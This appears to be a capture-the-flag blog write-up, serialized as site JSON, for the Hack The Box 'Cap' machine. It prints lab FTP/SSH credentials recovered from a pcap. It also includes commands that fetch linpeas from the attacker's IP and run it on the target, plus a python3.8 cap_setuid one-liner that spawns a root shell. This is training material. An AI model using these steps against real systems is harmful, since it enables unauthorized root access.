[{"data":1,"prerenderedAt":659},["ShallowReactive",2],{"\u002F2025\u002Fhtb-cap-writeup":3,"surround-\u002F2025\u002Fhtb-cap-writeup":650},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"draft":6,"readingTime":14,"body":19,"_type":643,"_id":644,"_source":645,"_file":646,"_stem":647,"_extension":648,"_original_dir":649},"\u002F2025\u002Fhtb-cap-writeup","2025",false,"","HTB - Cap","A step-by-step guide on how to solve the Hack The Box 'Cap' machine. This write-up covers the initial foothold by analyzing a pcap file to find FTP credentials and privilege escalation by exploiting python capabilities.","2025-10-27T15:49:55.000Z","https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002Fthumbnail.jpg",[13],"CTF",{"text":15,"minutes":16,"time":17,"words":18},"2 min read",1.885,113100,377,{"type":20,"children":21,"toc":637},"root",[22,28,44,51,55,69,73,97,101,113,133,137,157,161,167,189,193,214,218,239,243,248,254,275,322,369,373,385,437,472,485,490,525,530,598,622,627,631],{"type":23,"tag":24,"props":25,"children":27},"element","pic",{"src":26},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F1.jpg",[],{"type":23,"tag":29,"props":30,"children":31},"p",{},[32,35],{"type":33,"value":34},"text","Target IP: ",{"type":23,"tag":36,"props":37,"children":41},"a",{"href":38,"rel":39},"https:\u002F\u002Fapp.hackthebox.com\u002Fmachines\u002FCap",[40],"nofollow",[42],{"type":33,"value":43},"10.10.10.245",{"type":23,"tag":45,"props":46,"children":48},"h2",{"id":47},"reconnaissance",[49],{"type":33,"value":50},"Reconnaissance",{"type":23,"tag":24,"props":52,"children":54},{"src":53},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F2.jpg",[],{"type":23,"tag":29,"props":56,"children":57},{},[58,60,67],{"type":33,"value":59},"Here we detect that we have 3 open ports. Let's examine the site on port ",{"type":23,"tag":61,"props":62,"children":64},"code",{"className":63},[],[65],{"type":33,"value":66},"80",{"type":33,"value":68},".",{"type":23,"tag":24,"props":70,"children":72},{"src":71},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F3.jpg",[],{"type":23,"tag":29,"props":74,"children":75},{},[76,78,84,86,95],{"type":33,"value":77},"We are manually inspecting our site. Here we see that we can download a ",{"type":23,"tag":61,"props":79,"children":81},{"className":80},[],[82],{"type":33,"value":83},".pcap",{"type":33,"value":85}," file from the ",{"type":23,"tag":61,"props":87,"children":92},{"className":88,"id":90,"style":91},[89],"example-info","just-like-this","color: #4DFFBE",[93],{"type":33,"value":94},"Security Snapshot (5 Second PCAP + Analysis)",{"type":33,"value":96}," tab.",{"type":23,"tag":24,"props":98,"children":100},{"src":99},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F4.jpg",[],{"type":23,"tag":29,"props":102,"children":103},{},[104,106,111],{"type":33,"value":105},"When we examine this ",{"type":23,"tag":61,"props":107,"children":109},{"className":108},[],[110],{"type":33,"value":83},{"type":33,"value":112},", we can't find anything inside. The download page already shows how many packets it contains, etc.",{"type":23,"tag":29,"props":114,"children":115},{},[116,118,124,126,131],{"type":33,"value":117},"In this case, we can try to do a directory scan on the ",{"type":23,"tag":61,"props":119,"children":121},{"className":120},[],[122],{"type":33,"value":123},"\u002Fdata\u002F",{"type":33,"value":125}," directory. Maybe we can find other ",{"type":23,"tag":61,"props":127,"children":129},{"className":128},[],[130],{"type":33,"value":83},{"type":33,"value":132}," files.",{"type":23,"tag":24,"props":134,"children":136},{"src":135},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F5.jpg",[],{"type":23,"tag":29,"props":138,"children":139},{},[140,142,148,150,155],{"type":33,"value":141},"Here, when we check the ",{"type":23,"tag":61,"props":143,"children":145},{"className":144,"id":90,"style":91},[89],[146],{"type":33,"value":147},"\u002Fdata\u002F0",{"type":33,"value":149}," directory, we get a ",{"type":23,"tag":61,"props":151,"children":153},{"className":152},[],[154],{"type":33,"value":83},{"type":33,"value":156}," file with packages inside.",{"type":23,"tag":24,"props":158,"children":160},{"src":159},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F6.jpg",[],{"type":23,"tag":45,"props":162,"children":164},{"id":163},"initial-access",[165],{"type":33,"value":166},"Initial Access",{"type":23,"tag":29,"props":168,"children":169},{},[170,172,178,180,188],{"type":33,"value":171},"Now let's download this ",{"type":23,"tag":61,"props":173,"children":175},{"className":174},[],[176],{"type":33,"value":177},"0.pcap",{"type":33,"value":179}," file and examine it with ",{"type":23,"tag":181,"props":182,"children":185},"span",{"className":183,"id":90,"style":184},[89],"color: #77BEF0",[186],{"type":33,"value":187},"Wireshark",{"type":33,"value":68},{"type":23,"tag":24,"props":190,"children":192},{"src":191},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F7.jpg",[],{"type":23,"tag":29,"props":194,"children":195},{},[196,198,204,206,212],{"type":33,"value":197},"When we examine this file, we obtain a successful FTP login and the user credentials ",{"type":23,"tag":61,"props":199,"children":201},{"className":200,"id":90,"style":91},[89],[202],{"type":33,"value":203},"nathan:Buck3tH4TF0RM3!",{"type":33,"value":205},". So let's connect to our open ",{"type":23,"tag":61,"props":207,"children":209},{"className":208,"id":90,"style":91},[89],[210],{"type":33,"value":211},"ftp",{"type":33,"value":213}," server with this information.",{"type":23,"tag":24,"props":215,"children":217},{"src":216},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F8.jpg",[],{"type":23,"tag":29,"props":219,"children":220},{},[221,223,229,231,237],{"type":33,"value":222},"From here we get our ",{"type":23,"tag":61,"props":224,"children":226},{"className":225},[],[227],{"type":33,"value":228},"user.txt",{"type":33,"value":230}," flag. We can't get anything else. So let's try to connect to the open ",{"type":23,"tag":61,"props":232,"children":234},{"className":233,"id":90,"style":91},[89],[235],{"type":33,"value":236},"ssh",{"type":33,"value":238}," port with the user information we have.",{"type":23,"tag":24,"props":240,"children":242},{"src":241},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F9.jpg",[],{"type":23,"tag":29,"props":244,"children":245},{},[246],{"type":33,"value":247},"And yes, the person used the same password for ssh.",{"type":23,"tag":45,"props":249,"children":251},{"id":250},"privilege-escalation",[252],{"type":33,"value":253},"Privilege Escalation",{"type":23,"tag":29,"props":255,"children":256},{},[257,259,265,267,273],{"type":33,"value":258},"We uploaded our ",{"type":23,"tag":61,"props":260,"children":262},{"className":261},[],[263],{"type":33,"value":264},"linpeas.sh",{"type":33,"value":266}," script to the target's ",{"type":23,"tag":61,"props":268,"children":270},{"className":269},[],[271],{"type":33,"value":272},"\u002Ftmp",{"type":33,"value":274}," directory and ran it with the necessary permissions.",{"type":23,"tag":276,"props":277,"children":282},"pre",{"className":278,"code":279,"filename":280,"language":281,"meta":7,"style":7},"language-bash shiki shiki-themes catppuccin-latte one-dark-pro","wget https:\u002F\u002Fgithub.com\u002Fpeass-ng\u002FPEASS-ng\u002Freleases\u002Fdownload\u002F20251017-d864f4c3\u002Flinpeas.sh\ncp linpeas.sh \u002Fvar\u002Fwww\u002Fhtml\n","local","bash",[283],{"type":23,"tag":61,"props":284,"children":285},{"__ignoreMap":7},[286,303],{"type":23,"tag":181,"props":287,"children":290},{"class":288,"line":289},"line",1,[291,297],{"type":23,"tag":181,"props":292,"children":294},{"style":293},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#61AFEF;--shiki-dark-font-style:inherit",[295],{"type":33,"value":296},"wget",{"type":23,"tag":181,"props":298,"children":300},{"style":299},"--shiki-default:#40A02B;--shiki-dark:#98C379",[301],{"type":33,"value":302}," https:\u002F\u002Fgithub.com\u002Fpeass-ng\u002FPEASS-ng\u002Freleases\u002Fdownload\u002F20251017-d864f4c3\u002Flinpeas.sh\n",{"type":23,"tag":181,"props":304,"children":306},{"class":288,"line":305},2,[307,312,317],{"type":23,"tag":181,"props":308,"children":309},{"style":293},[310],{"type":33,"value":311},"cp",{"type":23,"tag":181,"props":313,"children":314},{"style":299},[315],{"type":33,"value":316}," linpeas.sh",{"type":23,"tag":181,"props":318,"children":319},{"style":299},[320],{"type":33,"value":321}," \u002Fvar\u002Fwww\u002Fhtml\n",{"type":23,"tag":276,"props":323,"children":326},{"className":278,"code":324,"filename":325,"language":281,"meta":7,"style":7},"wget 10.10.14.65\u002Flinpeas.sh\nchmod +x linpeas.sh\n.\u002Flinpeas.sh\n","target",[327],{"type":23,"tag":61,"props":328,"children":329},{"__ignoreMap":7},[330,342,360],{"type":23,"tag":181,"props":331,"children":332},{"class":288,"line":289},[333,337],{"type":23,"tag":181,"props":334,"children":335},{"style":293},[336],{"type":33,"value":296},{"type":23,"tag":181,"props":338,"children":339},{"style":299},[340],{"type":33,"value":341}," 10.10.14.65\u002Flinpeas.sh\n",{"type":23,"tag":181,"props":343,"children":344},{"class":288,"line":305},[345,350,355],{"type":23,"tag":181,"props":346,"children":347},{"style":293},[348],{"type":33,"value":349},"chmod",{"type":23,"tag":181,"props":351,"children":352},{"style":299},[353],{"type":33,"value":354}," +x",{"type":23,"tag":181,"props":356,"children":357},{"style":299},[358],{"type":33,"value":359}," linpeas.sh\n",{"type":23,"tag":181,"props":361,"children":363},{"class":288,"line":362},3,[364],{"type":23,"tag":181,"props":365,"children":366},{"style":293},[367],{"type":33,"value":368},".\u002Flinpeas.sh\n",{"type":23,"tag":24,"props":370,"children":372},{"src":371},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F10.jpg",[],{"type":23,"tag":29,"props":374,"children":375},{},[376,378,384],{"type":33,"value":377},"Here we see that capabilities are set for ",{"type":23,"tag":61,"props":379,"children":381},{"className":380},[],[382],{"type":33,"value":383},"\u002Fusr\u002Fbin\u002Fpython3.8",{"type":33,"value":68},{"type":23,"tag":386,"props":387,"children":389},"alert",{"type":388},"error",[390,399,404,432],{"type":23,"tag":391,"props":392,"children":393},"template",{"v-slot:title":7},[394],{"type":23,"tag":29,"props":395,"children":396},{},[397],{"type":33,"value":398},"What are Linux Capabilities?",{"type":23,"tag":29,"props":400,"children":401},{},[402],{"type":33,"value":403},"Normally, there are two types of processes in Linux:",{"type":23,"tag":405,"props":406,"children":407},"ul",{},[408,421],{"type":23,"tag":409,"props":410,"children":411},"li",{},[412,419],{"type":23,"tag":181,"props":413,"children":416},{"className":414,"id":90,"style":415},[89],"color: #efb11d",[417],{"type":33,"value":418},"Privileged",{"type":33,"value":420},": Processes belonging to the root user (UID 0). These processes can do anything.",{"type":23,"tag":409,"props":422,"children":423},{},[424,430],{"type":23,"tag":181,"props":425,"children":427},{"className":426,"id":90,"style":415},[89],[428],{"type":33,"value":429},"Unprivileged",{"type":33,"value":431},": Processes belonging to normal users. The permissions of these processes are limited.",{"type":23,"tag":29,"props":433,"children":434},{},[435],{"type":33,"value":436},"Linux Capabilities is a security feature designed to divide the \"do anything\" power of the root user into smaller, more granular pieces. The goal is to give a program only the specific privilege it needs, rather than giving it full root privileges.",{"type":23,"tag":29,"props":438,"children":439},{},[440,442,448,450,455,457,463,465],{"type":33,"value":441},"In our case, ",{"type":23,"tag":61,"props":443,"children":445},{"className":444},[],[446],{"type":33,"value":447},"cap_setuid,cap_net_bind_service+eip",{"type":33,"value":449}," is given for ",{"type":23,"tag":61,"props":451,"children":453},{"className":452},[],[454],{"type":33,"value":383},{"type":33,"value":456},". The most critical capability here is ",{"type":23,"tag":61,"props":458,"children":460},{"className":459},[],[461],{"type":33,"value":462},"cap_setuid",{"type":33,"value":464},". ",{"type":23,"tag":36,"props":466,"children":469},{"href":467,"rel":468},"https:\u002F\u002Fgtfobins.github.io\u002Fgtfobins\u002Fpython\u002F#capabilities",[40],[470],{"type":33,"value":471},"see",{"type":23,"tag":405,"props":473,"children":474},{},[475],{"type":23,"tag":409,"props":476,"children":477},{},[478,483],{"type":23,"tag":181,"props":479,"children":481},{"className":480,"id":90,"style":91},[89],[482],{"type":33,"value":462},{"type":33,"value":484},": Gives a process the ability to make the setuid() system call.",{"type":23,"tag":29,"props":486,"children":487},{},[488],{"type":33,"value":489},"So your goal is to run a short script using python3.8 that does these three things:",{"type":23,"tag":491,"props":492,"children":493},"ol",{},[494,507,520],{"type":23,"tag":409,"props":495,"children":496},{},[497,499,505],{"type":33,"value":498},"Import the ",{"type":23,"tag":61,"props":500,"children":502},{"className":501},[],[503],{"type":33,"value":504},"os",{"type":33,"value":506}," library.",{"type":23,"tag":409,"props":508,"children":509},{},[510,512,518],{"type":33,"value":511},"Make the current process root by calling the ",{"type":23,"tag":61,"props":513,"children":515},{"className":514},[],[516],{"type":33,"value":517},"os.setuid(0)",{"type":33,"value":519}," function.",{"type":23,"tag":409,"props":521,"children":522},{},[523],{"type":33,"value":524},"Start a new shell with root privileges.",{"type":23,"tag":29,"props":526,"children":527},{},[528],{"type":33,"value":529},"We can combine these into a single line as follows.",{"type":23,"tag":276,"props":531,"children":535},{"className":532,"code":533,"language":534,"meta":7,"style":7},"language-py shiki shiki-themes catppuccin-latte one-dark-pro","\u002Fusr\u002Fbin\u002Fpython3.8 -c 'import os; os.setuid(0); os.execv(\"\u002Fbin\u002Fbash\", [\"\u002Fbin\u002Fbash\", \"-p\"])'\n","py",[536],{"type":23,"tag":61,"props":537,"children":538},{"__ignoreMap":7},[539],{"type":23,"tag":181,"props":540,"children":541},{"class":288,"line":289},[542,548,554,558,564,568,573,578,583,588,593],{"type":23,"tag":181,"props":543,"children":545},{"style":544},"--shiki-default:#179299;--shiki-dark:#56B6C2",[546],{"type":33,"value":547},"\u002F",{"type":23,"tag":181,"props":549,"children":551},{"style":550},"--shiki-default:#4C4F69;--shiki-dark:#ABB2BF",[552],{"type":33,"value":553},"usr",{"type":23,"tag":181,"props":555,"children":556},{"style":544},[557],{"type":33,"value":547},{"type":23,"tag":181,"props":559,"children":561},{"style":560},"--shiki-default:#FE640B;--shiki-default-font-style:italic;--shiki-dark:#56B6C2;--shiki-dark-font-style:inherit",[562],{"type":33,"value":563},"bin",{"type":23,"tag":181,"props":565,"children":566},{"style":544},[567],{"type":33,"value":547},{"type":23,"tag":181,"props":569,"children":570},{"style":550},[571],{"type":33,"value":572},"python3",{"type":23,"tag":181,"props":574,"children":576},{"style":575},"--shiki-default:#7C7F93;--shiki-dark:#ABB2BF",[577],{"type":33,"value":68},{"type":23,"tag":181,"props":579,"children":580},{"style":550},[581],{"type":33,"value":582},"8 ",{"type":23,"tag":181,"props":584,"children":585},{"style":544},[586],{"type":33,"value":587},"-",{"type":23,"tag":181,"props":589,"children":590},{"style":550},[591],{"type":33,"value":592},"c ",{"type":23,"tag":181,"props":594,"children":595},{"style":299},[596],{"type":33,"value":597},"'import os; os.setuid(0); os.execv(\"\u002Fbin\u002Fbash\", [\"\u002Fbin\u002Fbash\", \"-p\"])'\n",{"type":23,"tag":405,"props":599,"children":600},{},[601,611],{"type":23,"tag":409,"props":602,"children":603},{},[604,609],{"type":23,"tag":61,"props":605,"children":607},{"className":606},[],[608],{"type":33,"value":517},{"type":33,"value":610},": Sets the user ID to 0 (root) using the cap_setuid capability.",{"type":23,"tag":409,"props":612,"children":613},{},[614,620],{"type":23,"tag":61,"props":615,"children":617},{"className":616},[],[618],{"type":33,"value":619},"os.execv(\"\u002Fbin\u002Fbash\", [\"\u002Fbin\u002Fbash\", \"-p\"])",{"type":33,"value":621},": Replaces the current process with a new \u002Fbin\u002Fbash shell with root privileges (and preserving those privileges thanks to the -p flag).",{"type":23,"tag":29,"props":623,"children":624},{},[625],{"type":33,"value":626},"In this case, we can see that we are root.",{"type":23,"tag":24,"props":628,"children":630},{"src":629},"https:\u002F\u002Fhackpaper-image-server.netlify.app\u002Fimages\u002Fblogs\u002Fhtb-cap-writeup\u002F11.jpg",[],{"type":23,"tag":632,"props":633,"children":634},"style",{},[635],{"type":33,"value":636},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":638,"depth":638,"links":639},4,[640,641,642],{"id":47,"depth":305,"text":50},{"id":163,"depth":305,"text":166},{"id":250,"depth":305,"text":253},"markdown","content:posts:2025:htb-cap-writeup.md","content","posts\u002F2025\u002Fhtb-cap-writeup.md","posts\u002F2025\u002Fhtb-cap-writeup","md","\u002Fposts",[651,655],{"_path":652,"title":653,"date":654},"\u002F2025\u002Ftryhackme-publisher-writeup","TryHackMe - Publisher","2025-10-23T16:16:07.000Z",{"_path":656,"title":657,"date":658},"\u002F2025\u002Fhtb-artificial-writeup","HTB - Artificial","2025-10-29T11:40:48.000Z",1776934251589]